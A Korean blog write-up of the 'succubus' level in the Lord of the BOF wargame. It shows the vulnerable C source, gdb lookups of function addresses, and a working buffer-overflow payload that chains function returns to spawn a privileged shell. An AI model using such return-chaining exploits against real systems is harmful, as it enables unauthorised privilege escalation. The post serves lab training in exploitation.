[zombie_assassin@localhost zombie_assassin]$ cat succubus.c
/*
The Lord of the BOF : The Fellowship of the BOF
- succubus
- calling functions continuously
*/
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
// the inspector
int check = 0;
void MO(char *cmd)
{
if(check != 4)
exit(0);
printf("welcome to the MO!\n");
// olleh!
system(cmd);
}
void YUT(void)
{
if(check != 3)
exit(0);
printf("welcome to the YUT!\n");
check = 4;
}
void GUL(void)
{
if(check != 2)
exit(0);
printf("welcome to the GUL!\n");
check = 3;
}
void GYE(void)
{
if(check != 1)
exit(0);
printf("welcome to the GYE!\n");
check = 2;
}
void DO(void)
{
printf("welcome to the DO!\n");
check = 1;
}
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// you cannot use library
if(strchr(argv[1], '\x40')){
printf("You cannot use library\n");
exit(0);
}
// check address
addr = (char *)&DO;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with DO\n");
exit(0);
}
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer
// 100 : extra space for copied argv[1]
memset(buffer, 0, 44);
memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));
// LD_* eraser
// 40 : extra space for memset function
memset(buffer-3000, 0, 3000-40);
}
소스가 굉장히 깁니다 .. 이번 문제는 어렵다 라기보다는 상대적으로 노가다성을 요구하는 문제엿습니다
마찬가지로 라이브러리를 사용할수 없고, buf , buf +48+100 을 memset 해버립니다
자세한 내용은 생략하고, DO GYE GUL YUT MO 순서대로 지역변수를 콜해줘야 하는상황입니다( check 변수가 걸려있죠?)
따라서 함수 주소들을 구해주고
(gdb) p DO
$1 = {<text variable, no debug info>} 0x80487ec <DO>
(gdb) p GYE
$2 = {<text variable, no debug info>} 0x80487bc <GYE>
(gdb) p GUL
$3 = {<text variable, no debug info>} 0x804878c <GUL>
(gdb) p YUT
$4 = {<text variable, no debug info>} 0x804875c <YUT>
(gdb) p MO
$5 = {<text variable, no debug info>} 0x8048724 <MO>
(gdb)
[payload]
BUF|SFP | &DO| &GYE|& GUL| &YUT |&MO |&AAAA |&/bin/sh| /bin/sh
[attack]
[zombie_assassin@localhost zombie_assassin]$ ./succubus $(python -c 'print "a"*44+"\xec\x87\x04\x08"+"\xbc\x87\x04\x08"+"\x8c\x87\x04\x08"+"\x5c\x87\x04\x08"+"\x24\x87\x04\x08"+"aaaa"+"\x98\xfa\xff\xbf/bin/sh"')
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?aaaa???bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$
성공
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
(LOB)level19.nightmare (0) | 2014.08.27 |
---|---|
(LOB)level18.succubus (0) | 2014.08.25 |
(LOB)level16.assassin (0) | 2014.08.25 |
(LOB)level15.giant (0) | 2014.08.22 |
(LOB)level14.bugbear (0) | 2014.08.20 |